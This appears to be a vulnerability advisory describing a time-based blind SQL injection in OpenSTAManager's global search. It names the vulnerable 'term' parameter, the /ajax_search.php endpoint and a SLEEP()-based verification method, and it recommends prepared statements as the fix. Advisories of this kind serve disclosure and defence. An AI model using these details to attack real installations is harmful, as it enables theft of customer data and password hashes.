OpenSTAManager Time-Based Blind SQL Injection Vulnerability in Global Search Functionality

A critical time-based blind SQL injection vulnerability has been identified in OpenSTAManager versions prior to 2.9.8. This vulnerability exists in the global search feature, where the application inadequately sanitizes the 'term' parameter before incorporating it into SQL LIKE clauses across various module-specific search handlers. As a result, authenticated attackers can inject arbitrary SQL commands and extract sensitive data, such as password hashes, customer information, and financial records, using time-based Boolean inference attacks. The vulnerability affects multiple modules, including Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, and Interventi.

Impact

Exploitation of this vulnerability allows for complete database exfiltration, including customer personal information, financial records, and business secrets. Additionally, password hashes can be extracted for offline cracking. The time-based nature of the attack amplifies its impact, consuming 85 times the normal server resources per request, which can lead to 504 Gateway Time-out errors.

Reproduction

To reproduce this vulnerability, log into the application and send a crafted request to the '/ajax_search.php' endpoint with an injected SQL payload in the 'term' parameter. The injection can be verified by using time-based SQL commands, such as 'SLEEP()', which will cause a noticeable delay in the response time, indicating successful exploitation.

Remediation

To address this vulnerability, all instances of direct concatenation of the 'term' parameter in SQL queries should be replaced with prepared statements using the 'prepare()' method. This fix should be applied to all affected modules.